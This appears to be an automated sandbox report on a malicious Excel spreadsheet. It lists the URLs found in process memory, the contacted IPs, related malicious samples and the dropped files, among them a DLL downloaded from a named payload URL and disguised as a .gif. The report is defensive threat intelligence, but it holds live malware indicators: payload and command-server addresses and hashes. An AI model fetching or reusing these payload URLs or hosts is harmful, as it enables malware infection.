https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com/communication-preferences?trk=homepage	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
http://ocsp.rootg2.amazontrust.com08	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/cn/?nc1=h_ls	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://aws.amazon.com/tw/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ko/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://aws.amazon.com/ru/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/es/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
http://crl.sca1b.amazontrust.com/sca1b.crl0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.373/style-awsm.css	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	false		high
https://a0.awsstatic.com/pricing-calculator/js/1.0.2	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/marketplace/?nc2=h_mo	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
http://ocsp.sca1b.amazontrust.com06	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://oskolko.uno/om/	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/search/	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/?nc2=h_lg	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://www.twitch.tv/aws	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/aws-blog/1.0.34/js	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/marketplace/?nc2=h_ql_mp	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/search	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
http://crl.rootg2.amazontrust.com/rootg2.crl0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp	false		high
https://a0.awsstatic.com/da/js/1.0.47/aws-da.js	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/tw/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://aws.amazon.com/tr/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/?nc2=h_m_mc	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
http://o.ss2.us/0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/search/?searchQuery=	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-search/1.0.13/js	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/privacy/?nc1=f_pr	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.373/libra-cardsui	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/pt/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/jp/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false		high
https://aws.amazon.com/marketplace?aws=hp	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2128397366.0000000000379000.00000004.00000020.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	idefje.ekfd.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/podcasts/aws-podcast/	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/jp/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
http://crt.rootg2.amazontrust.com/rootg2.cer0=	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://aws.amazon.com/pt/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://a0.awsstatic.com/plc/js/1.0.107/plc	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/es/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2128779790.0000000001E67000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://d1.awsstatic.com	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
https://aws.amazon.com/de/	rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp	false		high
https://phd.aws.amazon.com/?nc2=h_m_sc	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/id/?nc1=h_ls	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
https://miraclecollagen.co.za/ds/1802.Dc	document-1915351743.xls	false		high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0D	idefje.ekfd.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	rundll32.exe, 00000003.00000002.2129883264.0000000002DA0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com	rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico	rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp	false		high
http://s.ss2.us/r.crl0	rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
197.242.147.47	unknown	South Africa	37611	AfrihostZA	false
143.204.4.74	unknown	United States	16509	AMAZON-02US	false
206.189.10.247	unknown	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356250
Start date:	22.02.2021
Start time:	20:12:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	document-1915351743.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@3/11@5/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 50%) Quality average: 27.5% Quality standard deviation: 18.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
143.204.4.74	document-750895311.xls	Get hash	malicious	Browse
143.204.4.74	EHpIMi2I5F.doc	Get hash	malicious	Browse
206.189.10.247	iopjvdf.dll	Get hash	malicious	Browse	oskolko.uno/
206.189.10.247	document-750895311.xls	Get hash	malicious	Browse	oskolko.uno/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
dr49lng3n1n2s.cloudfront.net	iopjvdf.dll	Get hash	malicious	Browse	13.225.75.73
	document-750895311.xls	Get hash	malicious	Browse	143.204.4.74
	EHpIMi2I5F.doc	Get hash	malicious	Browse	143.204.4.74
	http://cloudfront.com	Get hash	malicious	Browse	13.225.75.73
	http://signin.aws.amazon.com.redirect.https.78417.aus%C3%BCberzeugung.de/c4ca4238a0b923820dcc509a6f75849b/9d6a4b72e90659bd43c194f96b762497/253c0116f9009cb64a7b4afeee5dbb27/ffc5e01f578535fd6f95f889cb31939d	Get hash	malicious	Browse	13.224.91.72
	Dianetax2018_2019.doc	Get hash	malicious	Browse	13.224.91.72
	http://dunemovie.com	Get hash	malicious	Browse	143.204.3.73
	BLUNT1040RET18.doc	Get hash	malicious	Browse	143.204.3.73
	19 extension.doc	Get hash	malicious	Browse	13.35.251.72
	AMZL-MME2-HS Consultant Weekly Report 33-05022020 WK06.xlsm	Get hash	malicious	Browse	143.204.3.71
	AMZL-MME2-HS Consultant Weekly Report 33-05022020 WK06.xlsm	Get hash	malicious	Browse	143.204.3.71
	http://aws.amazon.com.signin.redirect.uri.new.session.12.thepagemaster.de/?Z289MSZzMT01NzkyNTEmczI9MTYyNTkyOTcxJnMzPUdMQg==	Get hash	malicious	Browse	99.86.165.181
	http://milakeinternationnal.com/working.php?ytoew=EBM3600	Get hash	malicious	Browse	52.222.148.7
oskolko.uno	iopjvdf.dll	Get hash	malicious	Browse	206.189.10.247
oskolko.uno	document-750895311.xls	Get hash	malicious	Browse	206.189.10.247

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AfrihostZA	tems order.exe	Get hash	malicious	Browse	154.0.167.156
	INV3249732836.xlsm	Get hash	malicious	Browse	154.0.168.63
	New order.exe	Get hash	malicious	Browse	154.0.167.156
	INV6708494406.xlsm	Get hash	malicious	Browse	154.0.168.63
	SA00208.exe	Get hash	malicious	Browse	169.1.24.244
	Statement_as_of_01_FEB-2021.xlsm	Get hash	malicious	Browse	154.0.171.186
	000U0UUPOOO.exe	Get hash	malicious	Browse	154.0.170.214
	#B30COPY.htm	Get hash	malicious	Browse	154.0.175.244
	bin.sh	Get hash	malicious	Browse	169.173.126.123
	New order.exe	Get hash	malicious	Browse	154.0.163.40
	Review bank details.exe	Get hash	malicious	Browse	154.0.167.156
	3-321-68661.xls	Get hash	malicious	Browse	197.242.151.164
	#20030300COPY.htm	Get hash	malicious	Browse	154.0.175.244
	https://motswedingms.co.za/wp-content/axis/oauth/site/service/demp.php?email=kazou.mvl@cm.be	Get hash	malicious	Browse	154.0.173.185
	#20030300COPY.htm	Get hash	malicious	Browse	154.0.175.244
	DOCX9-29827.doc	Get hash	malicious	Browse	154.0.165.27
	#20030300COPY.htm	Get hash	malicious	Browse	154.0.175.244
	xJbFpiVs1l	Get hash	malicious	Browse	169.85.190.120
	bdOPjE89ck.dll	Get hash	malicious	Browse	169.217.238.137
	document-180101256.xls	Get hash	malicious	Browse	154.0.174.32
AMAZON-02US	X1(1).xlsm	Get hash	malicious	Browse	99.86.159.123
	wsXYadCYsE.pkg	Get hash	malicious	Browse	52.216.242.12
	X1(1).xlsm	Get hash	malicious	Browse	99.86.159.76
	X1(1).xlsm	Get hash	malicious	Browse	99.86.159.123
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	18.189.205.91
	1.apk	Get hash	malicious	Browse	52.29.131.127
	Small Charities.xlsx	Get hash	malicious	Browse	99.86.159.51
	Small Charities.xlsx	Get hash	malicious	Browse	99.86.159.51
	1.apk	Get hash	malicious	Browse	52.29.131.127
	CX2 RFQ.xlsm	Get hash	malicious	Browse	52.85.121.26
	CX2 RFQ.xlsm	Get hash	malicious	Browse	99.86.159.76
	CX2 RFQ.xlsm	Get hash	malicious	Browse	99.86.159.79
	Drawings.xlsm	Get hash	malicious	Browse	13.248.157.32
	proposal.xlsm	Get hash	malicious	Browse	44.227.76.166
	YSZiV5Oh2E.exe	Get hash	malicious	Browse	54.254.26.94
	iopjvdf.dll	Get hash	malicious	Browse	13.225.75.73
	document-750895311.xls	Get hash	malicious	Browse	143.204.4.74
	urgent specification request.exe	Get hash	malicious	Browse	54.238.136.178
	P.O-48452689535945.exe	Get hash	malicious	Browse	52.58.78.16
	C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm	Get hash	malicious	Browse	13.226.169.13

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	swift payment.doc	Get hash	malicious	Browse	143.204.4.74
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	143.204.4.74
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	143.204.4.74
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	143.204.4.74
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	143.204.4.74
	AswpCUetE0.doc	Get hash	malicious	Browse	143.204.4.74
	Sign-1870635479_637332644.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Heur.1476.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Heur.11266.xls	Get hash	malicious	Browse	143.204.4.74
	Sign-92793351_1597657581.xls	Get hash	malicious	Browse	143.204.4.74
	AWB783079370872.docm	Get hash	malicious	Browse	143.204.4.74
	document-750895311.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Heur.22173.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Exploit.Siggen3.10048.15397.xls	Get hash	malicious	Browse	143.204.4.74
	SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls	Get hash	malicious	Browse	143.204.4.74
	DocuSign_167.xls	Get hash	malicious	Browse	143.204.4.74
	DocuSign_139380140_1184163298.xls	Get hash	malicious	Browse	143.204.4.74
7dcce5b76c8b17472d024758970a406b	SecuriteInfo.com.Heur.15528.xls	Get hash	malicious	Browse	197.242.147.47
	Subconract 504.xlsm	Get hash	malicious	Browse	197.242.147.47
	upbck.xlsx	Get hash	malicious	Browse	197.242.147.47
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	197.242.147.47
	RFQ Manual Supersucker en Espaol.xlsx	Get hash	malicious	Browse	197.242.147.47
	_a6590.docx	Get hash	malicious	Browse	197.242.147.47
	Small Charities.xlsx	Get hash	malicious	Browse	197.242.147.47
	quotation10204168.dox.xlsx	Get hash	malicious	Browse	197.242.147.47
	notice of arrival.xlsx	Get hash	malicious	Browse	197.242.147.47
	22-2-2021 .xlsx	Get hash	malicious	Browse	197.242.147.47
	Shipping_Document.xlsx	Get hash	malicious	Browse	197.242.147.47
	Remittance copy.xlsx	Get hash	malicious	Browse	197.242.147.47
	CI + PL.xlsx	Get hash	malicious	Browse	197.242.147.47
	RFQ_Enquiry_0002379_.xlsx	Get hash	malicious	Browse	197.242.147.47
	124992436.docx	Get hash	malicious	Browse	197.242.147.47
	document-1900770373.xls	Get hash	malicious	Browse	197.242.147.47
	AswpCUetE0.doc	Get hash	malicious	Browse	197.242.147.47
	EIY2otZ3r8.doc	Get hash	malicious	Browse	197.242.147.47
	Invoice.ppt	Get hash	malicious	Browse	197.242.147.47
	Invoice.ppt	Get hash	malicious	Browse	197.242.147.47

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif	document-750895311.xls	Get hash	malicious	Browse
C:\Users\user\idefje.ekfd	document-750895311.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.080958610796428
Encrypted:	false
SSDEEP:	6:kKno3/PbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:/oPW3kPlE99SNxAhUeo+aKt
MD5:	48FD3ECB509C838EBE3337D410DF50BE
SHA1:	935F23F762F6CE8FD35CA842A96D7472750D92BA
SHA-256:	DCDF75F57C882001CA00EA337F902A141010F0E158936C21D9AE28FEDE690661
SHA-512:	1558E69DB1A11F850D19B83768C21263FC86682EA94AF79E44F9AB3BEAB9A8C59F8F99C4B52925933BD41BF77F464FA8F78A669EF7A858299094C6FA120553FE
Malicious:	false
Reputation:	low
Preview:	p...... .........VwK....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	downloaded
Size (bytes):	3137688
Entropy (8bit):	7.755290707394975
Encrypted:	false
SSDEEP:	49152:dqGB2KwBl+dyMzac4d12JVb4ZwDI0A3dQIOOtxE5/8ojWVVidT7gU9Y7xV:FB1wBlYykZ4L2JVkWQ3REJjWS7M7xV
MD5:	1D101557DC7B95085BA874AC4BDB38DC
SHA1:	D92E541C707CB8825860BA8F3BF801B06FB5B0C2
SHA-256:	21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
SHA-512:	31DFFD6AB386D1E6DF37D9AA0333C2D16B3E154D2557BF1D8BB39AE313285AE4FC463A4ED92B8A86F39FF4A624D35DFC83C1B7567E634A96E29B47347E5D6E2F
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 41%
Joe Sandbox View:	Filename: document-750895311.xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://miraclecollagen.co.za/ds/1802.gif
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......`.........." ................7.........................................G.....S.0...`.............................................V................... .F......./.......F......................................................P...............................text...C........................... ..`bss..........0...........................rdata.......@......................@..@.data........P......................@....pdata.......`......................@..@.vmp0...P....p......................`..`.vmp1...../.. ..../.................`..h.reloc........F......./.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab742.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
